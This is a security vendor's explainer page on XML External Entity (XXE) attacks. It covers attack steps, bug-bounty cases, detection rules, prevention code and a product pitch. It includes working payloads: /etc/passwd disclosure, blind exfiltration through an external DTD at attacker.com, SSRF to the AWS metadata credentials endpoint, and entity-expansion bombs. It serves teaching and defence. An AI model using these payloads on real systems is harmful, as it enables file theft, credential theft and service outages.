XML External Entity (XXE) Attack: Definition, How It Works & Prevention | PowerWAF

How XML External Entity (XXE) Attack Works

XML supports a feature called external entities, defined in a Document Type Definition (DTD). An entity is essentially a variable: <!ENTITY name "value"> defines an internal entity, while <!ENTITY name SYSTEM "file:///etc/passwd"> defines an external entity that loads its value from an external resource — a local file, a URL, or even a network service. When a vulnerable XML parser processes input containing these declarations and then expands the entity reference (&name;) in the document body, it fetches the external resource and includes its content in the parsed output. The attacker doesn't need special access — they simply submit crafted XML to any endpoint that parses XML input.

Identify XML input surfaces

The attacker maps all endpoints that accept or process XML: SOAP/REST API endpoints with Content-Type: application/xml or text/xml, file upload forms that accept DOCX/XLSX/SVG/XML files (all are XML-based), SAML SSO endpoints, RSS/Atom feed importers, XML-RPC endpoints, configuration file importers, and any endpoint that accepts multipart data where one part might be parsed as XML. Even JSON APIs may be vulnerable if the server also accepts XML (many frameworks auto-negotiate Content-Type). The attacker switches Content-Type from application/json to application/xml and submits equivalent XML — if the server processes it, XXE testing begins.

Test for basic XXE with a known file

The attacker submits XML containing an external entity that references a known, readable file: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. If the parsed response contains the file's content (the /etc/passwd user list), classic XXE is confirmed. On Windows, the test file is C:\Windows\win.ini. If the response doesn't reflect the entity value (the application doesn't echo the parsed XML), the attacker pivots to out-of-band (OOB) XXE, using an HTTP entity that triggers a callback to an attacker-controlled server: <!ENTITY xxe SYSTEM "http://attacker.com/xxe-test"> — a DNS lookup or HTTP request in the attacker's server logs confirms the vulnerability even without visible output.

Exfiltrate data via out-of-band channels

For blind XXE (no direct output), the attacker uses parameter entities to exfiltrate data through HTTP or DNS: (1) Define a parameter entity that reads a local file: <!ENTITY % data SYSTEM "file:///etc/passwd">; (2) Define a second entity that embeds the file content in a URL: <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?d=%data;'>">; (3) Host an external DTD on the attacker's server containing these definitions; (4) Reference the external DTD: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">. The parser fetches the external DTD, processes the chained entity definitions, reads the local file, and sends its contents to the attacker's server as a URL parameter. DNS-based exfiltration works even when HTTP is blocked.

Perform SSRF via XXE

XXE is a powerful SSRF vector. By using entities with http:// or https:// URIs pointing to internal resources, the attacker forces the XML parser to make server-side requests: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> retrieves AWS instance metadata including temporary IAM credentials. <!ENTITY xxe SYSTEM "http://internal-api.corp:8080/admin/users"> accesses internal APIs. The XML parser acts as a proxy, making authenticated requests from the server's network position — bypassing firewalls, VPNs, and network segmentation that would block direct external access.

Denial of service and code execution

XXE enables potent DoS attacks: the 'Billion Laughs' attack (XML bomb) defines nested entities that expand exponentially — 10 levels of 10x expansion produce 10 billion entity copies from a few kilobytes of XML, consuming all available memory and crashing the parser. For code execution, PHP's expect:// wrapper (expect://id) executes system commands when used as an entity URI. Java's XSLT processing can be abused for code execution via embedded scripting. Even without direct code execution, the combination of file reading (extracting credentials) and SSRF (accessing internal services) typically provides a pathway to full server compromise.

Real-World Examples

2014

Facebook XXE via DOCX upload (Bug Bounty)

Security researcher Mohamed Ramadan discovered that Facebook's careers page processed uploaded DOCX resumes through an XML parser vulnerable to XXE. A DOCX file is a ZIP archive containing XML files — by modifying the internal XML to include an external entity pointing to a local file, the researcher read files from Facebook's servers. Facebook confirmed the vulnerability, patched it, and awarded a bug bounty. The case demonstrated that any file format based on XML (DOCX, XLSX, PPTX, ODT, SVG) can be an XXE vector, even when the application doesn't appear to accept raw XML input.

2018

SAML XXE affecting multiple SSO providers

Researchers from Duo Security (now part of Cisco) discovered XXE vulnerabilities in seven SAML SSO libraries across multiple languages (Python, Ruby, PHP, Java). SAML — the protocol underpinning enterprise single sign-on — uses signed XML messages. The vulnerable libraries parsed the XML before validating the signature, allowing attackers to inject XXE payloads into authentication messages. Any application using these libraries for SSO (including OneLogin, Shibboleth deployments, and custom SAML integrations) was vulnerable to authentication bypass, file disclosure, and SSRF. The finding affected thousands of enterprise applications.

2016

Uber XXE via XLSX fare calculation

A researcher discovered that Uber's driver partner portal processed uploaded XLSX spreadsheets with a vulnerable XML parser. By crafting an XLSX file containing XXE payloads in the internal XML documents, the researcher achieved local file reading on Uber's servers. The vulnerability was in the fare calculation import feature where drivers uploaded spreadsheets. Uber awarded a $10,000 bug bounty. The case highlighted how XXE can hide in any feature that processes structured document formats — spreadsheets, word documents, presentations — not just obvious XML APIs.

Impact & Risk Assessment

XXE is rated High (and was a dedicated OWASP Top 10 category in 2017 as A4: XML External Entities) because it provides a versatile toolkit for attackers: local file disclosure reveals credentials, keys, and source code; SSRF enables access to cloud metadata endpoints and internal services; DoS via XML bombs can crash production systems; and in specific configurations, code execution is achievable. The attack surface is deceptively large — XXE isn't limited to explicit XML APIs. Any application processing DOCX, XLSX, SVG, SAML, RSS, SOAP, or configuration files may be vulnerable. The prevalence of XML in enterprise systems (SOAP services, SAML SSO, document processing pipelines) means that XXE continues to affect critical infrastructure even as newer applications move to JSON. Bug bounty programs consistently rank XXE among the top 10 most reported vulnerability classes.

How to Detect XML External Entity (XXE) Attack

Monitor for XXE indicators across multiple layers: (1) WAF rules detecting DOCTYPE declarations, ENTITY definitions, and SYSTEM/PUBLIC keywords in incoming XML payloads — these rarely appear in legitimate application input; (2) Scan for entity references (&xxe;, %) and suspicious URIs in XML content (file://, expect://, php://, http:// pointing to internal IPs or metadata endpoints); (3) Monitor outbound network connections from XML processing services — a parser making HTTP/DNS requests to unexpected destinations indicates XXE or SSRF exploitation; (4) Application-level logging that records XML parsing events and flags any external entity resolution; (5) Memory monitoring on XML processing services — sudden memory spikes indicate XML bomb (Billion Laughs) attacks; (6) Intrusion detection rules for known XXE payloads in HTTP request bodies and multipart upload content.

How to Prevent XML External Entity (XXE) Attack

The primary defense is disabling external entity processing in the XML parser — this single configuration change neutralizes nearly all XXE variants. Implementation varies by language: (1) Java: DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) or use defusedxml; (2) Python: use defusedxml library instead of xml.etree, or set forbid_dtd=True, forbid_entities=True, forbid_external=True on the parser; (3) PHP: libxml_disable_entity_loader(true) (PHP < 8.0) or ensure LIBXML_NOENT is never passed to the parser; (4) .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; (5) Ruby/Nokogiri: Nokogiri::XML(input) { |config| config.noent.nonet }. Additionally: validate and sanitize XML input using schemas (XSD), reject XML containing DOCTYPE declarations at the WAF level, convert XML APIs to JSON where possible, keep XML processing libraries updated, and apply least privilege to the service account running XML processing to limit the impact of file disclosure.

Code Examples

Classic XXE: Local file disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>attacker@example.com</email>
</user>

<!-- Server response includes the contents of /etc/passwd:
<user>
  <name>root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...</name>
  <email>attacker@example.com</email>
</user>
-->

<!-- Blind XXE via out-of-band exfiltration: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

<!-- evil.dtd hosted on attacker's server:
  <!ENTITY % payload "<!ENTITY send SYSTEM 'http://attacker.com/exfil?d=%file;'>">
  %payload;
-->

Vulnerable vs. Secure: Java XML parsing
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;
import java.io.ByteArrayInputStream;

public class XMLProcessor {

    // VULNERABLE: Default Java DocumentBuilder allows external entities
    public Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // No security features configured — XXE is possible!
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }

    // SECURE: Disable DTDs and external entities entirely
    public Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // Disallow DTDs entirely (the nuclear option — most effective)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl", true);

        // Defense-in-depth: disable external entities even if DTD is somehow allowed
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities", false);

        // Disable external DTD loading
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

        // Disable XInclude processing
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }
}

Secure: Python XML parsing with defusedxml
# VULNERABLE: Standard library XML parsers are XXE-prone
# import xml.etree.ElementTree as ET  # DO NOT USE for untrusted XML
# tree = ET.parse('input.xml')         # Allows external entities!

# SECURE: Use the defusedxml library (pip install defusedxml)
import defusedxml.ElementTree as ET
from defusedxml import DefusedXmlException
from defusedxml.common import DTDForbidden, EntitiesForbidden

def parse_xml_safely(xml_string: str) -> dict:
    """Parse XML input with all dangerous features disabled."""
    try:
        # defusedxml automatically blocks:
        # - DTD processing
        # - External entity expansion
        # - External DTD loading
        # - Entity expansion beyond configurable limits
        root = ET.fromstring(xml_string)

        return {
            'tag': root.tag,
            'text': root.text,
            'children': [
                {'tag': child.tag, 'text': child.text}
                for child in root
            ]
        }

    except DTDForbidden:
        raise ValueError('XML with DTD declarations is not allowed')
    except EntitiesForbidden:
        raise ValueError('XML with entity definitions is not allowed')
    except DefusedXmlException as e:
        raise ValueError(f'Potentially malicious XML blocked: {e}')
    except ET.ParseError as e:
        raise ValueError(f'Invalid XML: {e}')


# For DOCX/XLSX/SVG file processing:
def safe_process_docx(file_path: str):
    """Process DOCX files with XXE protection."""
    import zipfile
    import defusedxml.ElementTree as SafeET

    with zipfile.ZipFile(file_path, 'r') as z:
        # DOCX internal XML files that could contain XXE
        for xml_file in ['word/document.xml', 'word/styles.xml']:
            if xml_file in z.namelist():
                with z.open(xml_file) as f:
                    # Parse each internal XML file safely
                    tree = SafeET.parse(f)  # XXE blocked automatically

Frequently Asked Questions

Yes — this is one of the most common misconceptions about XXE. Any application that processes XML-based file formats is potentially vulnerable: DOCX/XLSX/PPTX (Office Open XML), SVG images, RSS/Atom feeds, SAML authentication messages, XHTML input, SOAP requests, PDF files with XFA forms, and configuration files (web.config, .plist, pom.xml). If your application accepts file uploads and processes any of these formats, it may be vulnerable to XXE even if it has no explicit XML API endpoint.

The Billion Laughs attack (also called an XML bomb) is a DoS attack using nested entity expansion. It defines 10 entities where each references the previous 10 times: <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> ... up to lol9. The initial entity 'lol' might be just 3 bytes, but after 9 levels of 10x expansion, it produces 10^9 (one billion) copies — approximately 3 GB of data from a ~1 KB XML document. This exhausts the parser's memory and crashes the process. The defense is to limit entity expansion depth and total expanded size, or simply disallow DTD processing.

JSON itself doesn't support entity declarations or external references, so JSON parsing is not vulnerable to XXE. However, many web frameworks accept both JSON and XML (content negotiation), and an attacker can send an XML payload with Content-Type: application/xml to an endpoint that normally receives JSON. If the framework automatically parses XML when the Content-Type header indicates it, the endpoint becomes vulnerable to XXE despite being designed for JSON. Always explicitly restrict the accepted Content-Type to only the formats your application needs.

A WAF provides valuable protection by detecting DOCTYPE declarations, ENTITY definitions, SYSTEM/PUBLIC keywords, and known XXE payloads in HTTP request bodies. PowerWAF's XXE detection covers direct XML payloads, XXE in multipart file uploads (DOCX, XLSX, SVG), encoded variants, and parameter entity abuse. However, WAF protection should complement — not replace — parser-level hardening (disabling external entities) because some XXE vectors use legitimate-looking XML structures that are difficult to distinguish from normal input without deep content inspection.

XXE is one of the most powerful SSRF delivery mechanisms. When an XML parser resolves an external entity with an HTTP/HTTPS URI, it makes a server-side request from the application server's network position. This allows the attacker to access internal services (http://internal-api:8080/), cloud metadata endpoints (http://169.254.169.254/), and other resources behind the firewall — exactly like traditional SSRF. The key difference is the delivery mechanism: SSRF exploits application logic that makes HTTP requests, while XXE exploits the XML parser itself. Defending against one doesn't protect against the other.

PowerWAF automatically blocks XML External Entity (XXE) Attack at the edge.

Deploy in minutes. No code changes required. Free plan available.

Start Free See Documentation

Free plan spots are limited · No credit card required